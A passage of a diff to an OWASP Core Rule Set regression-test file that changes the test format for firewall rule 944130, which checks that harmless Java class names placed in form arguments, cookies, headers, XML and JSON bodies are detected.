"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 257 desc: "Cookie name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 258 desc: "Request header test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 259 desc: "XML attribute value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 260 desc: "XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" 
- Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 261 desc: "Nested XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 262 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword 
java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.StringReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 265 desc: "Argument test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "test=java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 266 desc: "Argument name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log: + expect_ids: [944130] + - test_id: 267 desc: "Cookie test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 268 desc: "Cookie name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Class=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 269 desc: "Request header test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-270 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 270 desc: "XML attribute value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 271 desc: "XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 272 desc: "Nested XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 273 desc: "Content-Type text/plain includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 274 desc: "Content-Type application/json arg value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Class\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log: + expect_ids: [944130] + - test_id: 275 desc: "Content-Type application/json arg name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Class\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 276 desc: "Argument test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 277 desc: "Argument name includes keyword java.lang.Integer" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log: + expect_ids: [944130] + - test_id: 278 desc: "Cookie test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" 
+ uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 279 desc: "Cookie name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Integer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 280 desc: "Request header test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 281 desc: "XML attribute value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 282 desc: "XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-283 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 283 desc: "Nested XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 284 desc: "Content-Type text/plain includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - 
